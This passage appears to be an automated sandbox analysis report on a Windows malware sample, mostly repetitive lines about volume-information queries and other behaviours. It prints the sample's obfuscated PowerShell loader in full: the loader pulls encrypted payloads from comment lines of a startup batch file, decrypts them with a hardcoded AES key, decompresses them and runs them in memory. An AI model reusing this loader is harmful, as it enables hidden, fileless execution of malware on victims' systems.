'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A3BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,

0_2_00A3BEFF

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A40826 cpuid

0_2_00A40826

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00A3C093

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
